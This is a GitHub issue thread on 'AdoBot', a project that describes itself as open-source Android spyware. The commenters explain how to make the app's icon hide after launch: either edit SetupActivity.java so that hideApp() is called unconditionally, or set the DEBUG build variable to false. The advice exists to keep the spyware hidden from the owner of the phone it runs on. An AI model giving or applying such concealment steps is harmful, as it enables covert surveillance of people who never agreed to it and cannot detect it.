adonespitogo / AdoBot

Open-source android spyware
MIT License
823 stars 312 forks source link

application icon hide #2

Closed sureshchitmil closed 6 years ago

sureshchitmil commented 7 years ago

icon not hiding

chandanl commented 6 years ago

In the java file app/src/main/java/com/android/adobot/activities/SetupActivity.java find line saying :

if (!BuildConfig.DEBUG) hideApp();

Now remove the if condition leaving hideApp(); method After Modification it should look like this

hideapp();

Then compile the app Now the icon should hide after the first launch and restarting. :)

adonespitogo commented 6 years ago

I think there was a setting in gradle to set build config variables - that includes the DEBUG variable. Set DEBUG to false for the app to actually hide when compiled.